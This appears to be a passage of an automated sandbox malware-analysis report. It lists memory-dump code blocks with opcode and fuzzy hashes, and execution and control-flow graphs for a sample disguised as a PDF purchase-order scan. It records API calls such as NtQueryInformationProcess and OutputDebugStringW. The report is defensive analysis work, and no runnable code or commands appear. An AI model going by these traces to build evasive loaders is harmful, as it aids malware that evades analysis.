                                                                                  • Instruction ID: deec5109cf97016407c1588c736bfbaa13abdcafd612f41d72b3e39d308d174c
                                                                                  • Opcode Fuzzy Hash: e1d529faea6972b9c6e342f18b3faed8cb8be81ba4e726eef7001442378891b2
                                                                                  • Instruction Fuzzy Hash: B211C1363055218FD7165B2EC46852E7BA2BF9A7553194469E916CF3A4CF30CC028B90
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dc52652fa87aa4d0c4a86aa23adcbd6c439a9783ad1e92a1b3a93c3686c39b37
                                                                                  • Instruction ID: 94172fa449b3c194a4b28c0efd679d30645afa4bdea79e64d0934a7cccb0dd1e
                                                                                  • Opcode Fuzzy Hash: dc52652fa87aa4d0c4a86aa23adcbd6c439a9783ad1e92a1b3a93c3686c39b37
                                                                                  • Instruction Fuzzy Hash: 5021F379C0525A8FCF11DFA9D8455EEBFF0FF4A204F10426AD815B7254E7301A45DBA1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c4261fafc412dd0037fc2f702d5cbe0f0e4f12ccdbb6344e7e376a05652e7a51
                                                                                  • Instruction ID: 9c3a537e632fe5ba973e82b027afd3989b54947f07fce0c6c0cc53b0d572ced3
                                                                                  • Opcode Fuzzy Hash: c4261fafc412dd0037fc2f702d5cbe0f0e4f12ccdbb6344e7e376a05652e7a51
                                                                                  • Instruction Fuzzy Hash: D82147B0D0030D9FEB55DFAAD94079EBFF2FB85700F0085AAC458AB264EB345E458B81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 171ffa1c4bea5ba18295a7ed3f96e642e5bfb1746828fc0a8a28091dbdaa262d
                                                                                  • Instruction ID: fc0914a96b15410fc865fabee4cda3e78b2606657b426ea99a2defe3e5797936
                                                                                  • Opcode Fuzzy Hash: 171ffa1c4bea5ba18295a7ed3f96e642e5bfb1746828fc0a8a28091dbdaa262d
                                                                                  • Instruction Fuzzy Hash: AD114C336042645FCB228E6998005EE3FA6FBDA610B08805BF904CF284EA35CD158791
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880326831.00000000014CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014CD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_14cd000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                  • Instruction ID: 96dab9d731d67fc7ccac5bd7e4c85ffdaa7c1effa57c7659ae7d4c79789ee26f
                                                                                  • Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
                                                                                  • Instruction Fuzzy Hash: C111AF7A904280CFCB16CF54D5C4B16BF72FB88724F2485AED8490B667C33AD456CBA2
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8f5fa55be534b98a38527801542ab664bbe67f1d3ea2f267c5f6fce08cb46a1d
                                                                                  • Instruction ID: 9d01774aadddc9e586a69d58fccd42628f7192e95631bf23d4e5392eab34fba4
                                                                                  • Opcode Fuzzy Hash: 8f5fa55be534b98a38527801542ab664bbe67f1d3ea2f267c5f6fce08cb46a1d
                                                                                  • Instruction Fuzzy Hash: B6114970D0020DDFEB44EFAAD94079EBBF2FB84701F00C5AAC418AB264EB345E458B81
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: aabc3c3d6a796ff2251a5570c190e426e181c040468936278e5bfa11fa173093
                                                                                  • Instruction ID: b4d533e402e2b55180fe2ab0debfe1cafde813414e8c7e8a4810cfd8a7316d98
                                                                                  • Opcode Fuzzy Hash: aabc3c3d6a796ff2251a5570c190e426e181c040468936278e5bfa11fa173093
                                                                                  • Instruction Fuzzy Hash: 5611C2323102268FEB249BA8D854BAE7BAABF84605B104069E225CF2D5DF35CC05C721
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880431828.00000000014DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 014DD000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_14dd000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                  • Instruction ID: d14421829bb145fde25e24b8668c2cca48ea4c00fe54759e60b35af6a1620c90
                                                                                  • Opcode Fuzzy Hash: 8009cd9747851c6a16484d38da83a80e1112e09f0888f91abd329c0e09305381
                                                                                  • Instruction Fuzzy Hash: 7611BE75904244CFCB16CF64C5D4B16BBA2FB84318F24C6AAD8494B3A3C33AD44ACF51
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1eb5683d7de98ec15a42b36d24ea02d96ed7f6a210ee43cdcfb3a6f4877e589c
                                                                                  • Instruction ID: b95865ae2fe013d065f8010d1c25ef56023c406f197e477a633f5295ef29690a
                                                                                  • Opcode Fuzzy Hash: 1eb5683d7de98ec15a42b36d24ea02d96ed7f6a210ee43cdcfb3a6f4877e589c
                                                                                  • Instruction Fuzzy Hash: DD1179B5D0030ADFCB01CFA8D8449AEBBB1FB8A300F004066E820A7390D7345E4ACF91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a61a24ab4ffa47128af8286e0c53ee30da929a1cf15e169879c5e25a2f3ac22f
                                                                                  • Instruction ID: 668dc9222acca89d390884af78c971516c9054c56399daf75d44cd0481c981e1
                                                                                  • Opcode Fuzzy Hash: a61a24ab4ffa47128af8286e0c53ee30da929a1cf15e169879c5e25a2f3ac22f
                                                                                  • Instruction Fuzzy Hash: 43F0F6363002204B972A5A2ED454A2EBADEFFCAA553054079F909CF7A1EE21CC03C780
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6a2f9adeb803530e6afe0948913f540b4ec79eb93d6c2dfdf5ddeae98b8881d7
                                                                                  • Instruction ID: a021a19b3fd43284358be4cf342cfd16c4f95b62eb16a40ca2b0cf93ff2009dd
                                                                                  • Opcode Fuzzy Hash: 6a2f9adeb803530e6afe0948913f540b4ec79eb93d6c2dfdf5ddeae98b8881d7
                                                                                  • Instruction Fuzzy Hash: 8CF0A93A3002256FD7182AA59850A7FBACBFFCD264F148025FA09CB384DE71CC11A3E0
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c4f982f85c5eae1e79c544ce7c7767459abc6dc2a760c9676ab41d6596aa0581
                                                                                  • Instruction ID: 593b7029188ca04497afbb437483045f2776c1ef60df0cc79466d9f7e5aedd9f
                                                                                  • Opcode Fuzzy Hash: c4f982f85c5eae1e79c544ce7c7767459abc6dc2a760c9676ab41d6596aa0581
                                                                                  • Instruction Fuzzy Hash: 6FE0D8314093D14FE7938735AC684493F75FAA300470C95D7D4004E6ABDE740C0A8B22
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 250ebd0ecdff5b8e44b61ca4e32444f23f279e7ea67025cfeccd4c41b7d8d42c
                                                                                  • Instruction ID: e8071344c1759f604ed9db9e60af2667971d76bf36252c2dac849e7754d7ad73
                                                                                  • Opcode Fuzzy Hash: 250ebd0ecdff5b8e44b61ca4e32444f23f279e7ea67025cfeccd4c41b7d8d42c
                                                                                  • Instruction Fuzzy Hash: 8BD05B31D2022B97CB10E7A5DC044DFF73CEED5261B904626D52537150FB712659C6E1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3d731f6b9a28facd9b0a0e039eaf45a8b70cce241cd80f2fda15ef55ea6c58a9
                                                                                  • Instruction ID: 305910c67ba83dd25fa589959b861f748a99e36434e888e5b0e3279bcdac4d15
                                                                                  • Opcode Fuzzy Hash: 3d731f6b9a28facd9b0a0e039eaf45a8b70cce241cd80f2fda15ef55ea6c58a9
                                                                                  • Instruction Fuzzy Hash: 98D0123354D1342ED775408D7C45DFB67DDE3C23B4B21013BFA2CD728198424C8145A4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 02127158a4ffa7408f18b2e25380510675b3cb69129826d7c240bae0f1260847
                                                                                  • Instruction ID: 05cef195afb58a1dfa99338b1d9f6ed6700d85a635ce06bdb8e7e075fee50cbf
                                                                                  • Opcode Fuzzy Hash: 02127158a4ffa7408f18b2e25380510675b3cb69129826d7c240bae0f1260847
                                                                                  • Instruction Fuzzy Hash: 14D01275D20226C6CB10EBA1AC440DDB738AE95225B548626D535372A0EB71175986D1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 52be3132737de38e0c28b9a50e0e338e4b6e7fe18a6d079d411aa9844b9be45c
                                                                                  • Instruction ID: d53822e139292fcd20ebc3bdc421f602d87f2bd234880a0279981730ca0aac6b
                                                                                  • Opcode Fuzzy Hash: 52be3132737de38e0c28b9a50e0e338e4b6e7fe18a6d079d411aa9844b9be45c
                                                                                  • Instruction Fuzzy Hash: 7FD04239E44109CBCB70DFA8E4884DCFBB1FB89226B10542AD92AA7651D63064559F11
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c79b77d734461f530a4ad2602933ea46e2a7f06e67ca6c6d7bd90d56c9f3c9f5
                                                                                  • Instruction ID: e014e00285d76c506837f6226e39aef9ed0be64aba3a1114d661c1ff4804c3cf
                                                                                  • Opcode Fuzzy Hash: c79b77d734461f530a4ad2602933ea46e2a7f06e67ca6c6d7bd90d56c9f3c9f5
                                                                                  • Instruction Fuzzy Hash: 38D0673AB000089FCB149F99E8409DDF7B6FB98221B048156E925A7264C6319925DB60
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.3880758987.0000000001520000.00000040.00000800.00020000.00000000.sdmp, Offset: 01520000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_1520000_Scan_Rev 20220731_PO&OC#88SU7782743882874_PDF.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ba172aa1683b782b47fabf5f88063817790fe4013a57bb2a11414d54bc7bc3dd
                                                                                  • Instruction ID: 4879651b8292058bc82a9dc781f114cc41c8253799b09e7865e586d9acd2e42f
                                                                                  • Opcode Fuzzy Hash: ba172aa1683b782b47fabf5f88063817790fe4013a57bb2a11414d54bc7bc3dd
                                                                                  • Instruction Fuzzy Hash: 11C012340003194FE781E767FC54555372AF7E05057409614D4050965EDFB86C864BA5

                                                                                  Execution Graph

                                                                                  Execution Coverage:11.5%
                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                  Signature Coverage:0%
                                                                                  Total number of Nodes:46
                                                                                  Total number of Limit Nodes:2
                                                                                  execution_graph 26276 2d9e298 26277 2d9e2da 26276->26277 26278 2d9e2e0 GetModuleHandleW 26276->26278 26277->26278 26279 2d9e30d 26278->26279 26280 87fb7ba 26281 87fb6f4 26280->26281 26284 87fb254 26281->26284 26288 87fb260 26281->26288 26285 87fbf78 OutputDebugStringW 26284->26285 26287 87fbff7 26285->26287 26287->26281 26289 87fc028 CloseHandle 26288->26289 26291 87fc096 26289->26291 26291->26281 26292 87fb638 26293 87fb65c 26292->26293 26294 87fb254 OutputDebugStringW 26293->26294 26295 87fb260 CloseHandle 26293->26295 26294->26293 26295->26293 26296 2d97f80 26298 2d97fa7 26296->26298 26297 2d98084 26298->26297 26300 2d97a1c 26298->26300 26301 2d99010 CreateActCtxA 26300->26301 26303 2d990d3 26301->26303 26304 87f6c00 26305 87f6c0c 26304->26305 26308 87f99b1 26305->26308 26306 87f6c1d 26309 87f99dc 26308->26309 26313 87fa8f8 26309->26313 26317 87fa8e8 26309->26317 26310 87f9a86 26310->26306 26314 87fa90a 26313->26314 26321 87fa929 26314->26321 26318 87fa90a 26317->26318 26320 87fa929 NtQueryInformationProcess 26318->26320 26319 87fa91e 26319->26310 26320->26319 26322 87fa952 26321->26322 26326 87fa9f8 26322->26326 26330 87faa08 26322->26330 26323 87fa91e 26323->26310 26327 87faa2c 26326->26327 26334 87f6b84 26327->26334 26331 87faa2c 26330->26331 26332 87f6b84 NtQueryInformationProcess 26331->26332 26333 87faab3 26332->26333 26333->26323 26335 87fab68 NtQueryInformationProcess 26334->26335 26337 87faab3 26335->26337 26337->26323

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 16 87f6b84-87fabf4 NtQueryInformationProcess 19 87fabfd-87fac11 16->19 20 87fabf6-87fabfc 16->20 20->19
                                                                                  APIs
                                                                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 087FABE7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1504130676.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_87f0000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationProcessQuery
                                                                                  • String ID:
                                                                                  • API String ID: 1778838933-0
                                                                                  • Opcode ID: d39a4dfa116a2d833e0927edc9746e344b1e5922699a60251817fd45adfba5bb
                                                                                  • Instruction ID: 5a892ceab92ff76e2677cb1e82299ae98e6b151776a8d156370907d524a64ae5
                                                                                  • Opcode Fuzzy Hash: d39a4dfa116a2d833e0927edc9746e344b1e5922699a60251817fd45adfba5bb
                                                                                  • Instruction Fuzzy Hash: 0721EDB59003599FCB10CF9AD884ADEFBF5FB48314F10852AEA18A7351C374A954CFA0

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 22 87fab60-87fabf4 NtQueryInformationProcess 24 87fabfd-87fac11 22->24 25 87fabf6-87fabfc 22->25 25->24
                                                                                  APIs
                                                                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 087FABE7
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1504130676.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_87f0000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID: InformationProcessQuery
                                                                                  • String ID:
                                                                                  • API String ID: 1778838933-0
                                                                                  • Opcode ID: d4c08a6e18ee5e0b2f7b3abb2b6c11ec7be2f80c05d84b2dbb34e8b707d10ac8
                                                                                  • Instruction ID: 5539b3ae7a5e0f99dfb940a16199f8136df11d3d4abb28f0db6c02e34a42fbde
                                                                                  • Opcode Fuzzy Hash: d4c08a6e18ee5e0b2f7b3abb2b6c11ec7be2f80c05d84b2dbb34e8b707d10ac8
                                                                                  • Instruction Fuzzy Hash: FD21F0B58013499FCB10CF9AD884ADEFFF5BB48324F10852EE928A7210C374A544CFA1

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 2d97a1c-2d990d1 CreateActCtxA 3 2d990da-2d99134 0->3 4 2d990d3-2d990d9 0->4 11 2d99143-2d99147 3->11 12 2d99136-2d99139 3->12 4->3 13 2d99149-2d99155 11->13 14 2d99158 11->14 12->11 13->14
                                                                                  APIs
                                                                                  • CreateActCtxA.KERNEL32(?), ref: 02D990C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1496934379.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_2d90000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create
                                                                                  • String ID:
                                                                                  • API String ID: 2289755597-0
                                                                                  • Opcode ID: 9ed0f95e210996f9a1b31dd25e73a43cfba0d99bb30e1c73e2d9818a3ea2d970
                                                                                  • Instruction ID: 8bc21b03c1b1eb6e3667d767a31f242ed8ca78dbcd60891173bd6e3a060179c4
                                                                                  • Opcode Fuzzy Hash: 9ed0f95e210996f9a1b31dd25e73a43cfba0d99bb30e1c73e2d9818a3ea2d970
                                                                                  • Instruction Fuzzy Hash: A141CF71D00719CBDB24DFA9C848BDEBBB5BF89704F20816AE408AB251DB756945CF90

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 27 87fb254-87fbfc2 30 87fbfca-87fbff5 OutputDebugStringW 27->30 31 87fbfc4-87fbfc7 27->31 32 87fbffe-87fc012 30->32 33 87fbff7-87fbffd 30->33 31->30 33->32
                                                                                  APIs
                                                                                  • OutputDebugStringW.KERNELBASE(00000000), ref: 087FBFE8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1504130676.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_87f0000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString
                                                                                  • String ID:
                                                                                  • API String ID: 1166629820-0
                                                                                  • Opcode ID: 34322839dfcc06090c12c87b9350b759a1997097994cccb49b743a9b186399fc
                                                                                  • Instruction ID: b6b551824a9663a0c37f05a5f139353f1c3bc4a322e957041f3cc1eeb8599f6f
                                                                                  • Opcode Fuzzy Hash: 34322839dfcc06090c12c87b9350b759a1997097994cccb49b743a9b186399fc
                                                                                  • Instruction Fuzzy Hash: 251156B1C0460A9BCB10CF9AD444BAEFBF4FB48721F10862AE918B3340C774A944CFA1

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 35 87fbf71-87fbfc2 37 87fbfca-87fbff5 OutputDebugStringW 35->37 38 87fbfc4-87fbfc7 35->38 39 87fbffe-87fc012 37->39 40 87fbff7-87fbffd 37->40 38->37 40->39
                                                                                  APIs
                                                                                  • OutputDebugStringW.KERNELBASE(00000000), ref: 087FBFE8
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1504130676.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_87f0000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID: DebugOutputString
                                                                                  • String ID:
                                                                                  • API String ID: 1166629820-0
                                                                                  • Opcode ID: 9405c0166aa2be935aaf48c0083cc0716056154586db1a917e4704a1e2471d12
                                                                                  • Instruction ID: 04a00636a09d5a97805e51e7f41cd97c80f4c6e0e77d25d90c922320a56f3620
                                                                                  • Opcode Fuzzy Hash: 9405c0166aa2be935aaf48c0083cc0716056154586db1a917e4704a1e2471d12
                                                                                  • Instruction Fuzzy Hash: DC1144B1D0064A8FCB14CF9AD444BAEFBF0FF48320F10852AD818A7640C7746545CFA1

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 42 2d9e298-2d9e2d8 43 2d9e2da-2d9e2dd 42->43 44 2d9e2e0-2d9e30b GetModuleHandleW 42->44 43->44 45 2d9e30d-2d9e313 44->45 46 2d9e314-2d9e328 44->46 45->46
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 02D9E2FE
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1496934379.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_2d90000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: 319239c830208e8c33fdd46aaada62d65b484639c94834d2cc5c6817c91df0ea
                                                                                  • Instruction ID: d095dd4b2737c535b10e5ad094bdb29bada35f58f70f416f443398cbc0a9ae0c
                                                                                  • Opcode Fuzzy Hash: 319239c830208e8c33fdd46aaada62d65b484639c94834d2cc5c6817c91df0ea
                                                                                  • Instruction Fuzzy Hash: D11110B6C003498FDB20CF9AD444BDEFBF4AB88324F10881AD859A7300C379A545CFA1

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 378 87fb260-87fc094 CloseHandle 381 87fc09d-87fc0be 378->381 382 87fc096-87fc09c 378->382 382->381
                                                                                  APIs
                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 087FC087
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1504130676.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_87f0000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0
                                                                                  • Opcode ID: e1952b15c2e303f02ebade9a0f87064f68de909c829280a9ed8d930a8451771f
                                                                                  • Instruction ID: 1a3c18692450db54e019d4f46bd4a3236a598f8a9ea9315c8c12dc9296625cd8
                                                                                  • Opcode Fuzzy Hash: e1952b15c2e303f02ebade9a0f87064f68de909c829280a9ed8d930a8451771f
                                                                                  • Instruction Fuzzy Hash: 281128718007598FDB20DF9AD844BEEBBF4EF88321F108469D558A3341D778A945CFA5
                                                                                  APIs
                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 087FC087
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1504130676.00000000087F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 087F0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_87f0000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseHandle
                                                                                  • String ID:
                                                                                  • API String ID: 2962429428-0
                                                                                  • Opcode ID: c51817869be4c15f1b7ad8fe4540928186a1e8f6db795cc6c4ef7bcf7f9205bc
                                                                                  • Instruction ID: 09d93903b6087250cb7618212bcfddaacc7c22703e3be021d828a3d2ae72ad18
                                                                                  • Opcode Fuzzy Hash: c51817869be4c15f1b7ad8fe4540928186a1e8f6db795cc6c4ef7bcf7f9205bc
                                                                                  • Instruction Fuzzy Hash: 301155B18003498FDB20DFAAC844BDEBBF4EF48320F10846AD558A3391D378A545CFA5
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1495221720.000000000137D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0137D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_137d000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1009d2c79b759ebeb61769f21d76b9cb1cce7b31c3e4f973e79709276c734fa3
                                                                                  • Instruction ID: a8440b8e52e46cd6837362b91d1a5fe8d42a6543b0f5073eb526af6c8c417ac7
                                                                                  • Opcode Fuzzy Hash: 1009d2c79b759ebeb61769f21d76b9cb1cce7b31c3e4f973e79709276c734fa3
                                                                                  • Instruction Fuzzy Hash: 5F316F740493818FC7178F64D994611BFB1EF46324F1985EAC9458F267C33E984ADB62
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.1495172028.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_136d000_QeSBxb.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 31a39741e86f0952e8260339f9c5469ffa640f1765b838355d64710d5ff6885a
                                                                                  • Instruction ID: 5b4d014ac2cd3f5c1e8ad4789628a48d70e80adb80b9e0d3b872ac497958173b
                                                                                  • Opcode Fuzzy Hash: 31a39741e86f0952e8260339f9c5469ffa640f1765b838355d64710d5ff6885a
